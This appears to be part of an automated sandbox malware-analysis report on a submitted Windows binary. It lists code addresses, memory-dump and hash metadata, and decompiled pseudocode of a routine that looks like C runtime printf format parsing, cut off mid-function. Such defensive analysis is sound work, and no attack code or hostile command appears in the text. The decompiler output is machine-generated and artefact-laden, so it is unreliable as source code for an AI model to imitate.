                            0x00422508
                            0x00422508
                            0x004215df
                            0x004215e5
                            0x004215f2
                            0x004215f7
                            0x00000000
                            0x0042160a
                            0x00421614
                            0x0042163b
                            0x00421622
                            0x00421633
                            0x00421633
                            0x00421614
                            0x00421645
                            0x0042164b
                            0x00421657
                            0x0042165a
                            0x00421668
                            0x0042166b
                            0x00421678
                            0x0042171d
                            0x00421723
                            0x00421730
                            0x00000000
                            0x00000000
                            0x00421736
                            0x0042173c
                            0x00000000
                            0x00421743
                            0x00421743
                            0x0042175b
                            0x00421760
                            0x00421765
                            0x0042181f
                            0x00421832
                            0x00421837
                            0x00000000
                            0x0042176b
                            0x0042177e
                            0x00421783
                            0x00421789
                            0x0042178b
                            0x00421794
                            0x00421797
                            0x004217a3
                            0x004217a7
                            0x004217ad
                            0x004217af
                            0x004217b4
                            0x004217b6
                            0x004217bb
                            0x004217c0
                            0x004217c2
                            0x004217c7
                            0x004217cd
                            0x004217cf
                            0x004217cf
                            0x004217cd
                            0x004217d0
                            0x004217d7
                            0x00000000
                            0x004217d9
                            0x004217de
                            0x004217fa
                            0x00421802
                            0x0042180f
                            0x00421814
                            0x00000000
                            0x00421814
                            0x004217d7
                            0x00000000
                            0x0042183f
                            0x0042183f
                            0x00421846
                            0x00421849
                            0x0042184c
                            0x0042184f
                            0x00421852
                            0x00421855
                            0x00421858
                            0x0042185f
                            0x00421866
                            0x00000000
                            0x00000000
                            0x00421872
                            0x00421872
                            0x00421879
                            0x00421885
                            0x00421888
                            0x00421895
                            0x00000000
                            0x00000000
                            0x00421897
                            0x00421897
                            0x0042189d
                            0x0042189d
                            0x004218a4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004218e7
                            0x004218e7
                            0x004218f1
                            0x0042191b
                            0x0042191e
                            0x00421921
                            0x00421928
                            0x00421928
                            0x0042192c
                            0x004218f3
                            0x004218f3
                            0x004218ff
                            0x00421906
                            0x00421908
                            0x0042190b
                            0x0042190e
                            0x00421914
                            0x00421916
                            0x00421916
                            0x00421919
                            0x00000000
                            0x00000000
                            0x00421934
                            0x00421934
                            0x00000000
                            0x00000000
                            0x00421940
                            0x00421940
                            0x0042194a
                            0x0042196d
                            0x00421977
                            0x00421977
                            0x0042197b
                            0x0042194c
                            0x0042194c
                            0x00421958
                            0x0042195f
                            0x00421961
                            0x00421961
                            0x00421968
                            0x00000000
                            0x00000000
                            0x00421983
                            0x00421983
                            0x0042198a
                            0x00421996
                            0x00421999
                            0x004219a6
                            0x00421ab9
                            0x00000000
                            0x00421ab9
                            0x004219ac
                            0x004219ac
                            0x004219b2
                            0x004219b2
                            0x004219b9
                            0x00000000
                            0x004219ef
                            0x004219ef
                            0x004219f2
                            0x004219f8
                            0x00421a20
                            0x00421a20
                            0x00421a23
                            0x00421a29
                            0x00421a4e
                            0x00421a4e
                            0x00421a51
                            0x00421a57
                            0x00421a90
                            0x00421aa1
                            0x00000000
                            0x00421aa1
                            0x00421a59
                            0x00421a59
                            0x00421a5c
                            0x00421a62
                            0x00000000
                            0x00000000
                            0x00421a64
                            0x00421a64
                            0x00421a67
                            0x00421a6d
                            0x00000000
                            0x00000000
                            0x00421a6f
                            0x00421a6f
                            0x00421a72
                            0x00421a78
                            0x00000000
                            0x00000000
                            0x00421a7a
                            0x00421a7a
                            0x00421a7d
                            0x00421a83
                            0x00000000
                            0x00000000
                            0x00421a85
                            0x00421a85
                            0x00421a88
                            0x00421a8e
                            0x00421a92
                            0x00421a92
                            0x00000000
                            0x00421a92
                            0x00000000
                            0x00421a8e
                            0x00421a2b
                            0x00421a2b
                            0x00421a2e
                            0x00421a35
                            0x00000000
                            0x00000000
                            0x00421a37
                            0x00421a3a
                            0x00421a3d
                            0x00421a40
                            0x00421a43
                            0x00421a49
                            0x00000000
                            0x00421a49
                            0x004219fa
                            0x004219fa
                            0x004219fd
                            0x00421a04
                            0x00000000
                            0x00000000
                            0x00421a06
                            0x00421a09
                            0x00421a0c
                            0x00421a0f
                            0x00421a12
                            0x00421a18
                            0x00000000
                            0x00000000
                            0x00421aa3
                            0x00421aa6
                            0x00421aa9
                            0x00000000
                            0x00000000
                            0x004219c0
                            0x004219c0
                            0x004219c3
                            0x004219c9
                            0x004219e1
                            0x004219e4
                            0x004219e7
                            0x004219cb
                            0x004219ce
                            0x004219d1
                            0x004219d7
                            0x004219dc
                            0x004219dc
                            0x00000000
                            0x00000000
                            0x00421aae
                            0x00421ab1
                            0x00421ab6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004218c1
                            0x004218c4
                            0x004218c7
                            0x00000000
                            0x00000000
                            0x004218cc
                            0x004218cf
                            0x004218d4
                            0x00000000
                            0x00000000
                            0x004218b6
                            0x004218b6
                            0x004218b9
                            0x004218bc
                            0x00000000
                            0x00000000
                            0x004218ab
                            0x004218ae
                            0x004218b1
                            0x00000000
                            0x00000000
                            0x004218d9
                            0x004218d9
                            0x004218dc
                            0x004218df
                            0x00000000
                            0x00000000
                            0x004218e2
                            0x00000000
                            0x00000000
                            0x0042167e
                            0x00421680
                            0x0042168e
                            0x00421682
                            0x00421682
                            0x00421682
                            0x00421698
                            0x0042169e
                            0x004216ab
                            0x004216ad
                            0x004216b2
                            0x004216b4
                            0x004216b9
                            0x004216be
                            0x004216c0
                            0x004216c5
                            0x004216cb
                            0x004216cd
                            0x004216cd
                            0x004216cb
                            0x004216ce
                            0x004216d5
                            0x00000000
                            0x004216d7
                            0x004216dc
                            0x004216f8
                            0x00421700
                            0x0042170d
                            0x00421712
                            0x004225d1
                            0x004225de
                            0x004225de
                            0x004216d5
                            0x00421678
                            0x0042250d
                            0x00422514
                            0x0042252b
                            0x0042251f
                            0x0042251f
                            0x0042251f
                            0x00422535
                            0x0042253b
                            0x00422548
                            0x0042254a
                            0x0042254f
                            0x00422551
                            0x00422556
                            0x0042255b
                            0x0042255d
                            0x00422562
                            0x00422568
                            0x0042256a
                            0x0042256a
                            0x00422568
                            0x00422572
                            0x004225bd
                            0x004225c6
                            0x004225cb
                            0x00422574
                            0x00422579
                            0x00422595
                            0x0042259d
                            0x004225aa
                            0x004225af
                            0x004225af
                            0x00000000
                            0x00422572
                            0x0042230c
                            0x00422312
                            0x0042231c
                            0x00422331
                            0x00422346
                            0x00422348
                            0x0042234c
                            0x0042234c
                            0x00422333
                            0x00422333
                            0x00422337
                            0x00422337
                            0x0042231e
                            0x0042231e
                            0x00422322
                            0x00422322
                            0x0042231c
                            0x0042235c
                            0x00422368
                            0x0042237e
                            0x00422383
                            0x00422383
                            0x00422399
                            0x0042239e
                            0x004223a7
                            0x004223c5
                            0x004223ca
                            0x004223ca
                            0x004223d1
                            0x004224a5
                            0x004224b8
                            0x004224bd
                            0x00000000
                            0x004223e1
                            0x004223e1
                            0x004223e1
                            0x004223ee
                            0x004223f7
                            0x004223fd
                            0x004223fd
                            0x0042240c
                            0x00422414
                            0x00000000
                            0x00000000
                            0x0042241a
                            0x00422423
                            0x00422442
                            0x00422447
                            0x0042244a
                            0x00422459
                            0x00422466
                            0x00422471
                            0x00422471
                            0x00000000
                            0x0042247d
                            0x0042247d
                            0x00422496
                            0x0042249b
                            0x00000000
                            0x0042249b
                            0x00422466
                            0x004224a3
                            0x004224c0
                            0x004224c7
                            0x004224e5
                            0x004224ea
                            0x004224ea
                            0x00000000
                            0x004224c7
                            0x00421abe
                            0x00421abe
                            0x00421ac5
                            0x00421acb
                            0x00421ad1
                            0x00421ad4
                            0x00421ada
                            0x00421aed
                            0x00421aed
                            0x00421af4
                            0x00000000
                            0x00421e4e
                            0x00421e4e
                            0x00421e55
                            0x00421e5c
                            0x00421e5f
                            0x00000000
                            0x00000000
                            0x00421afb
                            0x00421afe
                            0x00421b04
                            0x00421b09
                            0x00421b0e
                            0x00421b0e
                            0x00000000
                            0x00000000
                            0x00421c3b
                            0x00421c3e
                            0x00421c43
                            0x00421c48
                            0x00421c4e
                            0x00421c4e
                            0x00000000
                            0x00000000
                            0x0042201b
                            0x0042201b
                            0x00000000
                            0x00000000
                            0x00421ba5
                            0x00421ba5
                            0x00421bb1
                            0x00421bbe
                            0x00421bcc
                            0x00421bcc
                            0x00421bd2
                            0x00421bd5
                            0x00421be1
                            0x00421c36
                            0x00000000
                            0x00421c36
                            0x00421bc0
                            0x00421bc0
                            0x00421bca
                            0x00421be6
                            0x00421be9
                            0x00421bef
                            0x00421c17
                            0x00421c1e
                            0x00421c24
                            0x00421c27
                            0x00421c2a
                            0x00421c30
                            0x00421c33
                            0x00421bf1
                            0x00421bf1
                            0x00421bf7
                            0x00421bfa
                            0x00421bfd
                            0x00421c03
                            0x00421c06
                            0x00421c09
                            0x00421c0b
                            0x00421c0e
                            0x00421c0e
                            0x00000000
                            0x00421bef
                            0x00000000
                            0x00000000
                            0x00421e65
                            0x00421e68
                            0x00421e6b
                            0x00421e6e
                            0x00421e74
                            0x00421e77
                            0x00421e82
                            0x00421e8d
                            0x00421e91
                            0x00421ea8
                            0x00421eaf
                            0x00421eb1
                            0x00421eb1
                            0x00421eb8
                            0x00421ebf
                            0x00421ed0
                            0x00421edf
                            0x00421ee6
                            0x00421efc
                            0x00421ee8
                            0x00421ee8
                            0x00421eeb
                            0x00421ef1
                            0x00421ef7
                            0x00421ef7
                            0x00421ee6
                            0x00421f06
                            0x00421f09
                            0x00421f0c
                            0x00421f0f
                            0x00421f12
                            0x00421f15
                            0x00421f1b
                            0x00421f21
                            0x00421f29
                            0x00421f2a
                            0x00421f2d
                            0x00421f2e
                            0x00421f31
                            0x00421f32
                            0x00421f39
                            0x00421f3a
                            0x00421f3d
                            0x00421f3e
                            0x00421f41
                            0x00421f42
                            0x00421f48
                            0x00421f49
                            0x00421f57
                            0x00421f59
                            0x00421f5f
                            0x00421f65
                            0x00421f6d
                            0x00421f75
                            0x00421f76
                            0x00421f79
                            0x00421f7a
                            0x00421f88
                            0x00421f8a
                            0x00421f8a
                            0x00421f8d
                            0x00421f97
                            0x00421f9c
                            0x00421fa2
                            0x00421fa4
                            0x00421fac
                            0x00421fad
                            0x00421fb0
                            0x00421fb1
                            0x00421fc0
                            0x00421fc2
                            0x00421fc2
                            0x00421fa2
                            0x00421fc5
                            0x00421fc8
                            0x00421fce
                            0x00421fd3
                            0x00421fd9
                            0x00421fdf
                            0x00421fe2
                            0x00421fe2
                            0x00421fe5
                            0x00421ff1
                            0x00000000
                            0x00421ff1
                            0x00421e93
                            0x00421e93
                            0x00421e9d
                            0x00000000
                            0x00000000
                            0x00421e9f
                            0x00421e9f
                            0x00000000
                            0x00421e9f
                            0x00421e84
                            0x00421e84
                            0x00000000
                            0x00000000
                            0x00421b11
                            0x00421b14
                            0x00421b1a
                            0x00421b75
                            0x00421b7d
                            0x00421b84
                            0x00421b8a
                            0x00421b90
                            0x00421b1c
                            0x00421b1c
                            0x00421b26
                            0x00421b2a
                            0x00421b32
                            0x00421b39
                            0x00421b46
                            0x00421b4d
                            0x00421b59
                            0x00421b66
                            0x00421b68
                            0x00421b68
                            0x00421b6f
                            0x00421b97
                            0x00421b9d
                            0x00000000
                            0x00000000
                            0x00421ff9
                            0x00421ffc
                            0x00421fff
                            0x00422002
                            0x00000000
                            0x00000000
                            0x00421d57
                            0x00421d57
                            0x00421d63
                            0x00421d70
                            0x00421e1a
                            0x00421e1d
                            0x00421e20
                            0x00421e34
                            0x00421e3a
                            0x00421e40
                            0x00421e22
                            0x00421e22
                            0x00421e2f
                            0x00421e2f
                            0x00421e42
                            0x00000000
                            0x00421e42
                            0x00421d76
                            0x00421d76
                            0x00421d78
                            0x00421d86
                            0x00421d7a
                            0x00421d7a
                            0x00421d7a
                            0x00421d90
                            0x00421d96
                            0x00421da3
                            0x00421da5
                            0x00421daa
                            0x00421dac
                            0x00421db1
                            0x00421db6
                            0x00421db8
                            0x00421dbd
                            0x00421dc3
                            0x00421dc5
                            0x00421dc5
                            0x00421dc3
                            0x00421dcd
                            0x00421e15
                            0x00000000
                            0x00421dcf
                            0x00421dcf
                            0x00421dd4
                            0x00421df0
                            0x00421df8
                            0x00421e02
                            0x00421e05
                            0x00421e0a
                            0x00000000
                            0x00421e0a
                            0x00000000
                            0x0042205c
                            0x0042205c
                            0x00422066
                            0x0042206c
                            0x00422071
                            0x00422077
                            0x00422077
                            0x00000000
                            0x00000000
                            0x00422014
                            0x00422014
                            0x00000000
                            0x00000000
                            0x00421c51
                            0x00421c55
                            0x00421c63
                            0x00421c66
                            0x00421c57
                            0x00421c57
                            0x00421c57
                            0x00421c6c
                            0x00421c72
                            0x00421c78
                            0x00421c84
                            0x00421c8a
                            0x00421c90
                            0x00421cf7
                            0x00421cfb
                            0x00421cfd
                            0x00421d03
                            0x00421d03
                            0x00421d06
                            0x00421d09
                            0x00421d0f
                            0x00421d0f
                            0x00421d0f
                            0x00421d1b
                            0x00421d1e
                            0x00421d26
                            0x00000000
                            0x00000000
                            0x00421d28
                            0x00421d28
                            0x00421d2e
                            0x00421d33
                            0x00000000
                            0x00000000
                            0x00421d35
                            0x00421d3b
                            0x00421d3e
                            0x00421d3e
                            0x00421d46
                            0x00421d4c
                            0x00421d4f
                            0x00000000
                            0x00421c92
                            0x00421c92
                            0x00421c96
                            0x00421c98
                            0x00421c9d
                            0x00421c9d
                            0x00421ca0
                            0x00421ca7
                            0x00421caa
                            0x00421cb0
                            0x00421cb0
                            0x00421cb0
                            0x00421cbc
                            0x00421cbf
                            0x00421cc7
                            0x00000000
                            0x00000000
                            0x00421cc9
                            0x00421cc9
                            0x00421ccf
                            0x00421cd4
                            0x00000000
                            0x00000000
                            0x00421cd6
                            0x00421cdc
                            0x00421cdf
                            0x00421cdf
                            0x00421ce7
                            0x00421ced
                            0x00421cf0
                            0x00421cf2
                            0x00421d52
                            0x00000000
                            0x00421d52
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422027
                            0x00422027
                            0x00422031
                            0x00422031
                            0x0042203b
                            0x00422041
                            0x00422043
                            0x0042204d
                            0x00422050
                            0x00422053
                            0x00422053
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00421af4
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422302
                            0x0042215f
                            0x00422156
                            0x0042207a
                            0x0042207a
                            0x0042207a

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: _get_int64_arg$__aulldiv__aullrem
                            • String ID: 9
                            • API String ID: 2124759748-2366072709
                            • Opcode ID: 9d9122a8fd2368d2df23634e3781078bab4f14e8da9bcb78073d504c68f81e25
                            • Instruction ID: e0798f233720da64f2ad7f2530df58488c946775afdde6470691a20e54dbd768
                            • Opcode Fuzzy Hash: 9d9122a8fd2368d2df23634e3781078bab4f14e8da9bcb78073d504c68f81e25
                            • Instruction Fuzzy Hash: CF41F5B1E05229EFDB64CF48DD89BAEB7B5BB44300F6081DAE509A7240C7785E81CF59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E004238AD(intOrPtr __ebx, signed int __edx, intOrPtr __edi, intOrPtr __esi) {
                            				signed int _t483;
                            				signed int _t502;
                            				void* _t507;
                            				signed int _t509;
                            				void* _t517;
                            				void* _t535;
                            				intOrPtr _t539;
                            				signed int _t556;
                            				signed short _t557;
                            				signed int _t560;
                            				signed int _t563;
                            				signed int _t564;
                            				intOrPtr _t565;
                            				signed int _t619;
                            				signed int _t621;
                            				signed int _t623;
                            				signed int _t630;
                            				signed int _t642;
                            				signed int _t669;
                            				intOrPtr _t670;
                            				intOrPtr _t671;
                            				signed int _t672;
                            				void* _t674;
                            				void* _t675;
                            				signed int _t681;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t671 = __esi;
                            					_t670 = __edi;
                            					_t619 = __edx;
                            					_t565 = __ebx;
                            					 *(_t672 - 8) = 0xa;
                            					L150:
                            					while(1) {
                            						L150:
                            						while(1) {
                            							L150:
                            							while(1) {
                            								L150:
                            								if(( *(_t672 - 0x10) & 0x00008000) == 0) {
                            									_t621 =  *(_t672 - 0x10) & 0x00001000;
                            									if(_t621 == 0) {
                            										if(( *(_t672 - 0x10) & 0x00000020) == 0) {
                            											_t623 =  *(_t672 - 0x10) & 0x00000040;
                            											if(_t623 == 0) {
                            												_t483 = E0041C290(_t672 + 0x14);
                            												_t675 = _t674 + 4;
                            												 *(_t672 - 0x4a0) = _t483;
                            												 *(_t672 - 0x49c) = 0;
                            											} else {
                            												_t556 = E0041C290(_t672 + 0x14);
                            												_t675 = _t674 + 4;
                            												asm("cdq");
                            												 *(_t672 - 0x4a0) = _t556;
                            												 *(_t672 - 0x49c) = _t623;
                            											}
                            										} else {
                            											_t669 =  *(_t672 - 0x10) & 0x00000040;
                            											if(_t669 == 0) {
                            												_t557 = E0041C290(_t672 + 0x14);
                            												_t675 = _t674 + 4;
                            												asm("cdq");
                            												 *(_t672 - 0x4a0) = _t557 & 0x0000ffff;
                            												 *(_t672 - 0x49c) = _t669;
                            											} else {
                            												_t560 = E0041C290(_t672 + 0x14);
                            												_t675 = _t674 + 4;
                            												asm("cdq");
                            												 *(_t672 - 0x4a0) = _t560;
                            												 *(_t672 - 0x49c) = _t669;
                            											}
                            										}
                            									} else {
                            										_t563 = E0041C2B0(_t672 + 0x14);
                            										_t675 = _t674 + 4;
                            										 *(_t672 - 0x4a0) = _t563;
                            										 *(_t672 - 0x49c) = _t621;
                            									}
                            								} else {
                            									_t564 = E0041C2B0(_t672 + 0x14);
                            									_t675 = _t674 + 4;
                            									 *(_t672 - 0x4a0) = _t564;
                            									 *(_t672 - 0x49c) = _t619;
                            								}
                            								if(( *(_t672 - 0x10) & 0x00000040) == 0) {
                            									L167:
                            									 *(_t672 - 0x4a8) =  *(_t672 - 0x4a0);
                            									 *(_t672 - 0x4a4) =  *(_t672 - 0x49c);
                            									goto L168;
                            								} else {
                            									L163:
                            									_t681 =  *(_t672 - 0x49c);
                            									if(_t681 > 0 || _t681 >= 0 &&  *(_t672 - 0x4a0) >= 0) {
                            										goto L167;
                            									} else {
                            										L166:
                            										asm("adc edx, 0x0");
                            										 *(_t672 - 0x4a8) =  ~( *(_t672 - 0x4a0));
                            										 *(_t672 - 0x4a4) =  ~( *(_t672 - 0x49c));
                            										 *(_t672 - 0x10) =  *(_t672 - 0x10) | 0x00000100;
                            										L168:
                            										if(( *(_t672 - 0x10) & 0x00008000) == 0 && ( *(_t672 - 0x10) & 0x00001000) == 0) {
                            											 *(_t672 - 0x4a4) =  *(_t672 - 0x4a4) & 0x00000000;
                            										}
                            										if( *(_t672 - 0x30) >= 0) {
                            											 *(_t672 - 0x10) =  *(_t672 - 0x10) & 0xfffffff7;
                            											if( *(_t672 - 0x30) > 0x200) {
                            												 *(_t672 - 0x30) = 0x200;
                            											}
                            										} else {
                            											 *(_t672 - 0x30) = 1;
                            										}
                            										if(( *(_t672 - 0x4a8) |  *(_t672 - 0x4a4)) == 0) {
                            											 *(_t672 - 0x1c) = 0;
                            										}
                            										 *((intOrPtr*)(_t672 - 4)) = _t672 - 0x249;
                            										while(1) {
                            											L178:
                            											_t629 =  *(_t672 - 0x30) - 1;
                            											 *(_t672 - 0x30) =  *(_t672 - 0x30) - 1;
                            											if( *(_t672 - 0x30) <= 0 && ( *(_t672 - 0x4a8) |  *(_t672 - 0x4a4)) == 0) {
                            												break;
                            											}
                            											L180:
                            											asm("cdq");
                            											_t630 =  *(_t672 - 0x4a8);
                            											 *((intOrPtr*)(_t672 - 0x494)) = E0041CE40(_t630,  *(_t672 - 0x4a4),  *(_t672 - 8), _t629) + 0x30;
                            											asm("cdq");
                            											 *(_t672 - 0x4a8) = E0041CDD0( *(_t672 - 0x4a8),  *(_t672 - 0x4a4),  *(_t672 - 8), _t630);
                            											 *(_t672 - 0x4a4) = _t630;
                            											if( *((intOrPtr*)(_t672 - 0x494)) > 0x39) {
                            												 *((intOrPtr*)(_t672 - 0x494)) =  *((intOrPtr*)(_t672 - 0x494)) +  *((intOrPtr*)(_t672 - 0x460));
                            											}
                            											 *((char*)( *((intOrPtr*)(_t672 - 4)))) =  *((intOrPtr*)(_t672 - 0x494));
                            											 *((intOrPtr*)(_t672 - 4)) =  *((intOrPtr*)(_t672 - 4)) - 1;
                            										}
                            										L183:
                            										 *((intOrPtr*)(_t672 - 0x24)) = _t672 - 0x249 -  *((intOrPtr*)(_t672 - 4));
                            										 *((intOrPtr*)(_t672 - 4)) =  *((intOrPtr*)(_t672 - 4)) + 1;
                            										if(( *(_t672 - 0x10) & 0x00000200) != 0 && ( *((intOrPtr*)(_t672 - 0x24)) == 0 ||  *((char*)( *((intOrPtr*)(_t672 - 4)))) != 0x30)) {
                            											 *((intOrPtr*)(_t672 - 4)) =  *((intOrPtr*)(_t672 - 4)) - 1;
                            											 *((char*)( *((intOrPtr*)(_t672 - 4)))) = 0x30;
                            											 *((intOrPtr*)(_t672 - 0x24)) =  *((intOrPtr*)(_t672 - 0x24)) + 1;
                            										}
                            										L187:
                            										while(1) {
                            											L187:
                            											while(1) {
                            												L187:
                            												while(1) {
                            													L187:
                            													while(1) {
                            														L187:
                            														while(1) {
                            															L187:
                            															while(1) {
                            																L187:
                            																while(1) {
                            																	do {
                            																		L187:
                            																		if( *((intOrPtr*)(_t672 - 0x28)) != 0) {
                            																			L212:
                            																			if( *(_t672 - 0x20) != 0) {
                            																				L0040C240( *(_t672 - 0x20), 2);
                            																				_t675 = _t675 + 8;
                            																				 *(_t672 - 0x20) = 0;
                            																			}
                            																			while(1) {
                            																				L214:
                            																				 *(_t672 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t672 + 0xc))));
                            																				_t578 =  *(_t672 - 0x454) & 0x0000ffff;
                            																				 *((intOrPtr*)(_t672 + 0xc)) =  *((intOrPtr*)(_t672 + 0xc)) + 2;
                            																				if(( *(_t672 - 0x454) & 0x0000ffff) == 0 ||  *(_t672 - 0x44c) < 0) {
                            																					break;
                            																				} else {
                            																					if(( *(_t672 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t672 - 0x454) & 0x0000ffff) > 0x78) {
                            																						 *(_t672 - 0x4d8) = 0;
                            																					} else {
                            																						 *(_t672 - 0x4d8) =  *(( *(_t672 - 0x454) & 0x0000ffff) + L"pecifier\", 0)") & 0xf;
                            																					}
                            																				}
                            																				L7:
                            																				 *(_t672 - 0x450) =  *(_t672 - 0x4d8);
                            																				_t642 =  *(_t672 - 0x450) * 9;
                            																				_t509 =  *(_t672 - 0x45c);
                            																				_t586 = ( *(_t642 + _t509 + 0x4083d0) & 0x000000ff) >> 4;
                            																				 *(_t672 - 0x45c) = ( *(_t642 + _t509 + 0x4083d0) & 0x000000ff) >> 4;
                            																				if( *(_t672 - 0x45c) != 8) {
                            																					L16:
                            																					 *(_t672 - 0x4e0) =  *(_t672 - 0x45c);
                            																					if( *(_t672 - 0x4e0) > 7) {
                            																						continue;
                            																					}
                            																					L17:
                            																					switch( *((intOrPtr*)( *(_t672 - 0x4e0) * 4 +  &M00423E84))) {
                            																						case 0:
                            																							L18:
                            																							 *(_t672 - 0xc) = 1;
                            																							E00423F90( *(_t672 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
                            																							_t675 = _t675 + 0xc;
                            																							goto L214;
                            																						case 1:
                            																							L19:
                            																							 *(__ebp - 0x2c) = 0;
                            																							__ecx =  *(__ebp - 0x2c);
                            																							 *(__ebp - 0x28) = __ecx;
                            																							__edx =  *(__ebp - 0x28);
                            																							 *(__ebp - 0x18) =  *(__ebp - 0x28);
                            																							__eax =  *(__ebp - 0x18);
                            																							 *(__ebp - 0x1c) =  *(__ebp - 0x18);
                            																							 *(__ebp - 0x10) = 0;
                            																							 *(__ebp - 0x30) = 0xffffffff;
                            																							 *(__ebp - 0xc) = 0;
                            																							goto L214;
                            																						case 2:
                            																							L20:
                            																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            																							 *(__ebp - 0x4e4) = __ecx;
                            																							 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
                            																							 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
                            																							if( *(__ebp - 0x4e4) > 0x10) {
                            																								goto L27;
                            																							}
                            																							L21:
                            																							_t57 =  *(__ebp - 0x4e4) + 0x423ebc; // 0x498d04
                            																							__ecx =  *_t57 & 0x000000ff;
                            																							switch( *((intOrPtr*)(__ecx * 4 +  &M00423EA4))) {
                            																								case 0:
                            																									goto L24;
                            																								case 1:
                            																									goto L25;
                            																								case 2:
                            																									goto L23;
                            																								case 3:
                            																									goto L22;
                            																								case 4:
                            																									goto L26;
                            																								case 5:
                            																									goto L27;
                            																							}
                            																						case 3:
                            																							L28:
                            																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            																							if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
                            																								 *(__ebp - 0x18) =  *(__ebp - 0x18) * 0xa;
                            																								_t81 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
                            																								__ecx =  *(__ebp - 0x18) * 0xa + _t81;
                            																								 *(__ebp - 0x18) = __ecx;
                            																							} else {
                            																								__edx = __ebp + 0x14;
                            																								 *(__ebp - 0x18) = E0041C290(__ebp + 0x14);
                            																								if( *(__ebp - 0x18) < 0) {
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																									__ecx =  *(__ebp - 0x18);
                            																									__ecx =  ~( *(__ebp - 0x18));
                            																									 *(__ebp - 0x18) = __ecx;
                            																								}
                            																							}
                            																							goto L214;
                            																						case 4:
                            																							L34:
                            																							 *(__ebp - 0x30) = 0;
                            																							goto L214;
                            																						case 5:
                            																							L35:
                            																							__edx =  *(__ebp - 0x454) & 0x0000ffff;
                            																							if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
                            																								__ecx =  *(__ebp - 0x30);
                            																								__ecx =  *(__ebp - 0x30) * 0xa;
                            																								_t92 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
                            																								__eax = __ecx + _t92;
                            																								 *(__ebp - 0x30) = __ecx + _t92;
                            																							} else {
                            																								__eax = __ebp + 0x14;
                            																								 *(__ebp - 0x30) = E0041C290(__ebp + 0x14);
                            																								if( *(__ebp - 0x30) < 0) {
                            																									 *(__ebp - 0x30) = 0xffffffff;
                            																								}
                            																							}
                            																							goto L214;
                            																						case 6:
                            																							L41:
                            																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            																							 *(__ebp - 0x4e8) = __ecx;
                            																							 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
                            																							 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
                            																							if( *(__ebp - 0x4e8) > 0x2e) {
                            																								L64:
                            																								goto L214;
                            																							}
                            																							L42:
                            																							_t100 =  *(__ebp - 0x4e8) + 0x423ee4; // 0x36f19003
                            																							__ecx =  *_t100 & 0x000000ff;
                            																							switch( *((intOrPtr*)(__ecx * 4 +  &M00423ED0))) {
                            																								case 0:
                            																									L47:
                            																									__ecx =  *(__ebp + 0xc);
                            																									__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																									if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
                            																										L50:
                            																										__ecx =  *(__ebp + 0xc);
                            																										__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																										if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
                            																											L53:
                            																											__ecx =  *(__ebp + 0xc);
                            																											__edx =  *__ecx & 0x0000ffff;
                            																											if(( *__ecx & 0x0000ffff) == 0x64) {
                            																												L59:
                            																												L61:
                            																												goto L64;
                            																											}
                            																											L54:
                            																											__eax =  *(__ebp + 0xc);
                            																											__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																											if(__ecx == 0x69) {
                            																												goto L59;
                            																											}
                            																											L55:
                            																											__edx =  *(__ebp + 0xc);
                            																											__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																											if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
                            																												goto L59;
                            																											}
                            																											L56:
                            																											__ecx =  *(__ebp + 0xc);
                            																											__edx =  *__ecx & 0x0000ffff;
                            																											if(( *__ecx & 0x0000ffff) == 0x75) {
                            																												goto L59;
                            																											}
                            																											L57:
                            																											__eax =  *(__ebp + 0xc);
                            																											__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																											if(__ecx == 0x78) {
                            																												goto L59;
                            																											}
                            																											L58:
                            																											__edx =  *(__ebp + 0xc);
                            																											__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
